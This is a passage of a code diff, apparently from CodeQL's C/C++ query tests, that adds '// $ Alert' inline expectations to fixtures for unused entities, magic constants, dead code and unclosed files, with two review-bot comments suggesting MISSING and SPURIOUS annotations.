@@ -119,7 +119,7 @@ void FUN(void) { i = 0x01f8; i = 0x01f8; - i = 278UL; + i = 278UL; // $ Alert i = 278UL; i = 278UL; i = 278UL; @@ -150,7 +150,7 @@ void FUN(void) { i = 278UL; i = 278UL; - i = -129; + i = -129; // $ Alert i = -129; i = -129; i = -129; diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h index 43e7b089389b..db7e962a5e4a 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/functions.h @@ -1,6 +1,6 @@ int myFunction1(int x = - 102 + 102 + 102 + + 102 + 102 + 102 + // $ Alert 102 + 102 + 102 + 102 + 102 + 102 + 102 + 102 + 102 + @@ -9,7 +9,7 @@ int myFunction1(int x = 102 + 102 + 102); void myFunction2( - int p1 = 103, + int p1 = 103, // $ Alert int p2 = 103, int p3 = 103, int p4 = 103, diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp index be73c87951c1..0ee90dc2460c 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/templates.cpp @@ -1,7 +1,7 @@ template void f(T x) { - 23; + 23; // $ Alert 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 23; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; 'A'; @@ -10,7 +10,7 @@ void f(T x) { void g(void) { int i; f(i); - 25; + 25; // $ Alert 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 25; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 'B'; 
diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref index 9caedcf3cc42..a75d078753d5 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/MagicConstantsString.qlref @@ -1 +1,2 @@ -Best Practices/Magic Constants/MagicConstantsString.ql +query: Best Practices/Magic Constants/MagicConstantsString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h index 231fb35a85da..42537352dffd 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/constants.h @@ -2,7 +2,7 @@ void FUN(void) { const char *s; - s = "abcabcabc"; + s = "abcabcabc"; // $ Alert s = "abcabcabc"; s = "abcabcabc"; s = "abcabcabc"; diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp index 766de394c494..ab0a45454451 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsString/joining.cpp @@ -36,7 +36,7 @@ void fn(const string &str1); void joining_test(const string &x, const string &y) \ { - fn("testrepo.git"); // BAD: "testrepo.git" + fn("testrepo.git"); // BAD: "testrepo.git" // $ Alert fn("testrepo.git"); fn("testrepo.git"); fn("testrepo.git"); 
@@ -104,7 +104,7 @@ void joining_test(const string &x, const string &y) \ ostream os; - os << "NO T_VOID CONSTRUCT"; // BAD: "NO T_VOID CONSTRUCT" + os << "NO T_VOID CONSTRUCT"; // BAD: "NO T_VOID CONSTRUCT" // $ Alert os << "NO T_VOID CONSTRUCT"; os << "NO T_VOID CONSTRUCT"; os << "NO T_VOID CONSTRUCT"; @@ -170,7 +170,7 @@ void joining_test(const string &x, const string &y) \ os << "writeString(" << x << ")"; os << "writeString(" << x << ")"; // (21 times) - os << "compiler error: no const of base type " + x; // BAD: "compiler error: no const of base type " + os << "compiler error: no const of base type " + x; // BAD: "compiler error: no const of base type " // $ Alert os << "compiler error: no const of base type " + x; os << "compiler error: no const of base type " + x; os << "compiler error: no const of base type " + x; diff --git a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp index b28d6c809dab..946d024691b3 100644 --- a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp +++ b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.cpp @@ -1,13 +1,13 @@ // NOT OK struct CopyButNoAssign { CopyButNoAssign() : n(0) {} - CopyButNoAssign(const CopyButNoAssign& copy_from) : n(copy_from.n) {} + CopyButNoAssign(const CopyButNoAssign& copy_from) : n(copy_from.n) {} // $ Alert int n; }; // NOT OK struct AssignButNoCopy { - AssignButNoCopy& operator=(const AssignButNoCopy& assign_from) { return *this; } + AssignButNoCopy& operator=(const AssignButNoCopy& assign_from) { return *this; } // $ Alert }; // OK: before C++11, marking a constructor as private was an 
@@ -78,7 +78,7 @@ struct NotFriend { // friend of CopyableByFriend. struct MyClassFriend { CopyableByFriend x; - MyClassFriend& operator=(const MyClassFriend& that) { return *this; } + MyClassFriend& operator=(const MyClassFriend& that) { return *this; } // $ Alert }; // OK or NOT OK? An explicit default and an explicit implementation. @@ -141,7 +141,7 @@ struct ProtectedAssign { // NOT OK: this class gets a copy assignment operator because it can access the // (protected) copy assignment operator of its base class. struct IsAProtectedAssign: public ProtectedAssign { - IsAProtectedAssign(const IsAProtectedAssign& that) {} + IsAProtectedAssign(const IsAProtectedAssign& that) {} // $ Alert }; // OK: this class gets no copy assignment operator. It cannot access the @@ -164,7 +164,7 @@ struct ProtectedCC { // NOT OK: this class gets a copy constructor because it can access the // (protected) copy constructor of its base class. struct IsAProtectedCC: public ProtectedCC { - IsAProtectedCC& operator=(const IsAProtectedCC& that) { return *this; } + IsAProtectedCC& operator=(const IsAProtectedCC& that) { return *this; } // $ Alert }; // OK: this class gets no copy constructor. It cannot access the (protected) @@ -309,5 +309,5 @@ class R1_B { // is generated by the compiler and callable outside the class. class R1_C { public: - R1_C(const R1_C& c) {} + R1_C(const R1_C& c) {} // $ Alert }; diff --git a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref index eb42b255e975..1a88c8671415 100644 --- a/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref +++ b/cpp/ql/test/query-tests/Best Practices/RuleOfTwo/RuleOfTwo.qlref @@ -1 +1,2 @@ -Best Practices/RuleOfTwo.ql +query: Best Practices/RuleOfTwo.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref index eb57378dea6b..6d979e18a560 100644 --- a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref +++ b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/SloppyGlobal.qlref @@ -1 +1,2 @@ -Best Practices/SloppyGlobal.ql +query: Best Practices/SloppyGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp index e279fbf02579..3fec05342802 100644 --- a/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp +++ b/cpp/ql/test/query-tests/Best Practices/SloppyGlobal/main.cpp @@ -1,19 +1,19 @@ // main.cpp -int x; // BAD: too short -int ys[1000000]; // BAD: too short +int x; // BAD: too short // $ Alert +int ys[1000000]; // BAD: too short // $ Alert int descriptive_name; // GOOD: sufficient static int z; // GOOD: not a global -int v1; // BAD: too short -int v2; // BAD: too short +int v1; // BAD: too short // $ Alert +int v2; // BAD: too short // $ Alert template -T v3; // BAD: too short +T v3; // BAD: too short // $ Alert template -T v4; // BAD: too short +T v4; // BAD: too short // $ Alert template -T v5; // BAD: too short +T v5; // BAD: too short // $ Alert void use_some_fs() { v2 = 100; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp index b4d0012cd920..98a530cb276b 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.cpp 
@@ -1,12 +1,12 @@ // unusedIncludes.cpp -#include "a.h" // unused +#include "a.h" // unused // $ Alert #include "b.h" #include "c.h" #include "d.hpp" -#include "e.hpp" // unused -#include "f.fwd.hpp" // unused -#include "g" // unused +#include "e.hpp" // unused // $ Alert +#include "f.fwd.hpp" // unused // $ Alert +#include "g" // unused // $ Alert int val_b = my_func_b(); int *my_c_ptr = &my_var_c; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref index 9759b522cf3a..c268214a8bf6 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedIncludes.ql +query: Best Practices/Unused Entities/UnusedIncludes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref index a206090d0f82..645e1ecaebd8 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedLocals.ql +query: Best Practices/Unused Entities/UnusedLocals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c index 74385634c419..313f5048d80f 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c 
@@ -7,16 +7,16 @@ void f1(unsigned int x) { } void f2(unsigned int x) { - unsigned int y = x + 1; // BAD: 'y' is unused - unsigned int z = x + 2; // BAD: 'z' is unused + unsigned int y = x + 1; // BAD: 'y' is unused // $ Alert + unsigned int z = x + 2; // BAD: 'z' is unused // $ Alert } #define my_int int #define COMPLEX_MACRO do { int z = 3; } while(0) void f3() { - int x = 1; // BAD: 'x' is unused - my_int y = 2; // BAD: 'y' is unused + int x = 1; // BAD: 'x' is unused // $ Alert + my_int y = 2; // BAD: 'y' is unused // $ Alert COMPLEX_MACRO; // GOOD: unused locals declared in macros are considered OK. } @@ -27,7 +27,7 @@ void write_ptr(int *ptr) { #define ZERO(x) x = 0 int f4() { - int a, b, c, d, e, f, g, h, i, j, k, l, m, n; // BAD: 'n' is unused + int a, b, c, d, e, f, g, h, i, j, k, l, m, n; // BAD: 'n' is unused // $ Alert a = b; c++; @@ -43,13 +43,13 @@ int f4() { } void f5() { - int x; // BAD: 'x' is unused + int x; // BAD: 'x' is unused // $ Alert { int x; { - int x; // BAD: 'x' is unused + int x; // BAD: 'x' is unused // $ Alert } x = 12; @@ -64,7 +64,7 @@ void f6() { int arr2[10]; int arr3[10]; int arr4[10]; - int arr5[10]; // BAD: 'arr5' is unused + int arr5[10]; // BAD: 'arr5' is unused // $ Alert int *ptr; int x; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp index 3b9904a9a290..af4d2aa33f5f 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp @@ -14,7 +14,7 @@ class MyClass { MyClass :: MyClass() { - int a, b, c, d, e; // BAD: 'e' is unused + int a, b, c, d, e; // BAD: 'e' is unused // $ Alert int &f = d; write_ref(a); 
@@ -29,8 +29,8 @@ MyClass :: ~MyClass() void test() { MyClass mc; // GOOD: constructor and destructor may have side-effects - MyClass *mc_ptr; // BAD: 'mc_ptr' is unused - MyClass &mc_ref = mc; // BAD: 'mc_ref' is unused + MyClass *mc_ptr; // BAD: 'mc_ptr' is unused // $ Alert + MyClass &mc_ref = mc; // BAD: 'mc_ref' is unused // $ Alert } // --- @@ -101,7 +101,7 @@ template void *instantiatedTemplateFunction3() // static unused int variable in twice instantiated template function template void *instantiatedTemplateFunction4() { - static int my_static; // BAD + static int my_static; // BAD // $ Alert static void* my_ptr = 0; return my_ptr; } @@ -129,7 +129,7 @@ void *nonTemplateFunction() // This is a non-template version of the above. void *nonTemplateFunction2() { - static int *my_static; // BAD + static int *my_static; // BAD // $ Alert static void* my_ptr = 0; return my_ptr; } @@ -245,7 +245,7 @@ class MyContainingClass void testFunction() { - MyMethodClass mmc; // BAD: unused + MyMethodClass mmc; // BAD: unused // $ Alert MyConstructorClass mcc; // GOOD MyDerivedClass mdc; // GOOD MyContainingClass mcc2; // GOOD diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp index 9a70fe989064..8ec61366ada6 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp @@ -2,13 +2,13 @@ int test_const_init() { - int v1; // BAD: unused + int v1; // BAD: unused // $ Alert int v2; // GOOD - int v3 = 0; // BAD: unused + int v3 = 0; // BAD: unused // $ Alert int v4 = 0; // GOOD const int v5 = 0; // BAD: unused [NOT DETECTED] const int v6 = 0; // GOOD - constexpr int v7 = 0; // BAD: unused + constexpr int v7 = 0; // BAD: unused // $ Alert constexpr int v8 = 0; // GOOD return v2 + v4 + v6 + v8; 
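Review bot: In the `test_const_init` hunk of UnusedLocals/code2.cpp, the context line `const int v5 = 0; // BAD: unused [NOT DETECTED]` records a known false negative only as free text, so the inline-expectations run does not track it. Writing it as `const int v5 = 0; // BAD: unused [NOT DETECTED] // $ MISSING: Alert` would make the test flag the line once the query starts reporting it. The same applies to the `myLambda` line marked `[NOT DETECTED]` in the `test_lambdas2` hunk of this file. Both functions continue outside their hunks.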
@@ -23,7 +23,7 @@ void myFunction() void test_template_parameter() { - constexpr int v1 = 0; // BAD: unused + constexpr int v1 = 0; // BAD: unused // $ Alert constexpr int v2 = 0; // GOOD: used as a template parameter below myFunction(); @@ -39,7 +39,7 @@ class MyBuffer void test_unused() { - MyBuffer myVar1; // BAD: unused + MyBuffer myVar1; // BAD: unused // $ Alert MyBuffer myVar2; // GOOD: used in deliberate void cast below MyBuffer myVar3 __attribute((__unused__)); // GOOD: unused but acknowledged @@ -61,7 +61,7 @@ void test_expect() { int v1 = getter(); // GOOD: v1 is used int v2 = getter(); // GOOD: v2 is used - int v3 = getter(); // BAD: unused + int v3 = getter(); // BAD: unused // $ Alert if (unlikely(v1 < 0)) { @@ -105,7 +105,7 @@ void test_range_based_for() output(v1); } - for (int v2 : myContainer) // BAD: v2 is not used + for (int v2 : myContainer) // BAD: v2 is not used // $ Alert { } } @@ -125,7 +125,7 @@ int test_lambdas1() int test_lambdas2() { - int a, b; // BAD: b is not used + int a, b; // BAD: b is not used // $ Alert auto myLambda = [=]() -> int // BAD: myLambda is not used [NOT DETECTED] (due to containing a Constructor) { return a; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c index 5b62ac7500dc..4c3ad88e6d04 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c @@ -7,7 +7,7 @@ void f_error(void) { } void g_error(void) { - int x, y, z; + int x, y, z; // $ Alert // This one should be reported despite the error in another function. z = y + y; } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref index dbf4c4e9172c..4865dfd4d434 100644 
--- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedStaticFunctions.ql +query: Best Practices/Unused Entities/UnusedStaticFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c index e3c2bc809e43..d9290b80d930 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c @@ -13,15 +13,15 @@ static void used_function2(void) { printf("Gets run 2\n"); } -static void unused_function(void) { +static void unused_function(void) { // $ Alert printf("Doesn't get run\n"); } -static void unused_function2(void) { +static void unused_function2(void) { // $ Alert printf("Doesn't get run 2\n"); } -static void unused_function3(void) { +static void unused_function3(void) { // $ Alert printf("Doesn't get run 3\n"); unused_function2(); } @@ -60,5 +60,5 @@ static void __attribute__ ((used)) h1(void) { static void __attribute__ ((unused)) h3(void) { } -static void h4(void) { +static void h4(void) { // $ Alert } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c index 7ce51610eefd..3d824228dbd1 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c 
@@ -2,11 +2,11 @@ static void mut_unused_function(void); static void mut_unused_function2(void); -static void mut_unused_function(void) { +static void mut_unused_function(void) { // $ Alert mut_unused_function2(); } -static void mut_unused_function2(void) { +static void mut_unused_function2(void) { // $ Alert mut_unused_function(); } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp index c0d83b52a578..0c36cf719e4c 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp @@ -16,7 +16,7 @@ const funstr myClass::fs[] = { }; // f2 is unreachable -static void f2(void) { } +static void f2(void) { } // $ Alert // f3 is reachable via f4/pf3 static void f3(void) { } @@ -30,8 +30,8 @@ void f4(void) { // f5 and f6 are mutually recursive unreachable static functions static void f6(void); -static void f5(void) { f6(); } -static void f6(void) { f5(); } +static void f5(void) { f6(); } // $ Alert +static void f6(void) { f5(); } // $ Alert // f7 and f8 are reachable from `function_caller` static int f7() { return 1; } // GOOD diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c index dc8c10095456..bbbab66f8f46 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c 
@@ -5,9 +5,9 @@ typedef struct _num_fun { } num_fun; static void f(void) {} // Used, via n1 -static void g(void) {} // Not used (n2 is static) +static void g(void) {} // Not used (n2 is static) // $ Alert static void h(void) {} // Used, via n3, via j -static void i(void) {} // Not used (k is static) +static void i(void) {} // Not used (k is static) // $ Alert num_fun n1 = {1, f}; static num_fun n2 = {1, g}; @@ -17,7 +17,7 @@ void j(void) { // Used (not static) num_fun n = n3; } -static void k(void) { // Not used (static) +static void k(void) { // Not used (static) // $ Alert num_fun n = {1, i}; n1.fun = i; } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref index 1b03ed4104bd..1240fc64dc56 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedStaticVariables.ql +query: Best Practices/Unused Entities/UnusedStaticVariables.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp index 2a5eeef6f0f6..0e25037f0513 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp 
@@ -4,12 +4,12 @@ static int staticVar1; // GOOD (used) static int staticVar2; // GOOD (used) static int staticVar3 = 3; // GOOD (used) static int staticVar4 = staticVar3; // GOOD (used) -static int staticVar5; // BAD (unused) -static int staticVar6 = 6; // BAD (unused) +static int staticVar5; // BAD (unused) // $ Alert +static int staticVar6 = 6; // BAD (unused) // $ Alert static __attribute__((__unused__)) int staticVar7; // GOOD (unused but this is expected) -const int constVar8 = 8; // BAD (const defaults to static) +const int constVar8 = 8; // BAD (const defaults to static) // $ Alert extern const int constVar9 = 9; // GOOD -static int staticVar10 = 10; // GOOD [FALSE POSITIVE] (referenced in a never instantiated template) +static int staticVar10 = 10; // GOOD [FALSE POSITIVE] (referenced in a never instantiated template) // $ Alert void f() { diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref index d15cbbfecd33..20ad76f506df 100644 --- a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref +++ b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref @@ -1 +1,2 @@ -Critical/DeadCodeFunction.ql +query: Critical/DeadCodeFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp index 8654b6facd64..e828c24fb8b0 100644 --- a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp +++ b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp @@ -2,7 +2,7 @@ static void usedByUnused() { } -static void unused() { +static void unused() { // $ Alert usedByUnused(); } diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref index 0786047da5f4..b76abda209d2 100644 
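Review bot: In UnusedStaticVariables/test.cpp, the `staticVar10` line is documented as `GOOD [FALSE POSITIVE]` but gets a plain `// $ Alert`, which records the false positive as an expected, correct result. Inline expectations have a form for known-wrong results, so the line could read `static int staticVar10 = 10; // GOOD [FALSE POSITIVE] (referenced in a never instantiated template) // $ SPURIOUS: Alert`. That keeps the test passing today and makes it fail visibly if the query stops reporting the variable, instead of leaving the expectation to look like intended behaviour.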
--- a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref +++ b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref @@ -1 +1,2 @@ -Critical/DeadCodeGoto.ql +query: Critical/DeadCodeGoto.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp index 12bef76a1e8a..dd4b5a9c325c 100644 --- a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp +++ b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp @@ -1,12 +1,12 @@ int test1(int x) { - goto label; // BAD + goto label; // BAD // $ Alert x++; label: return x; } int test2(int x) { do { - break; // BAD + break; // BAD // $ Alert x++; } while(false); return x; @@ -34,7 +34,7 @@ int test5(int x, int y) { goto label; // GOOD break; case 2: - break; // BAD + break; // BAD // $ Alert return x; case 3: return x; diff --git a/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref b/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref index 0f09c329e844..8d189be099bf 100644 --- a/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref +++ b/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref @@ -1 +1,2 @@ -Critical/FileMayNotBeClosed.ql +query: Critical/FileMayNotBeClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref b/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref index 825ac26f500c..25b57b1736d7 100644 --- a/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref +++ b/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref @@ -1 +1,2 @@ -Critical/FileNeverClosed.ql +query: Critical/FileNeverClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Critical/FileClosed/file.c b/cpp/ql/test/query-tests/Critical/FileClosed/file.c index 3d4bd39b1dce..fcc108631509 100644 --- a/cpp/ql/test/query-tests/Critical/FileClosed/file.c +++ b/cpp/ql/test/query-tests/Critical/FileClosed/file.c @@ -5,7 +5,7 @@ int fclose(FILE *fp); #define NULL ((FILE *)0) void f1(int i) { - FILE *f = fopen("somefile.txt", "r"); + FILE *f = fopen("somefile.txt", "r"); // $ Alert[cpp/file-may-not-be-closed] if (!f) return; @@ -15,7 +15,7 @@ void f1(int i) { } FILE *f2(int i) { - FILE *f = fopen("somefile.txt", "r"); + FILE *f = fopen("somefile.txt", "r"); // $ Alert[cpp/file-may-not-be-closed] if (!f) return NULL; @@ -31,7 +31,7 @@ void g2(int i) { } void f3(int i) { - FILE *f = fopen("somefile.txt", "r"); // Never closed + FILE *f = fopen("somefile.txt", "r"); // Never closed // $ Alert[cpp/file-never-closed] if (!f) return; @@ -63,7 +63,7 @@ void g5(void) { int f6(int b) { FILE *f; - f = fopen("somefile.txt", "r"); // Not always closed + f = fopen("somefile.txt", "r"); // Not always closed // $ Alert[cpp/file-may-not-be-closed] if (f) { if (b) { diff --git a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref index a186cc827ec5..7d2be720b2a7 100644 --- a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref +++ b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref @@ -1 +1,2 @@ -Critical/GlobalUseBeforeInit.ql +query: Critical/GlobalUseBeforeInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp index 81883a1a8a16..0a3ceabaef8f 100644 --- 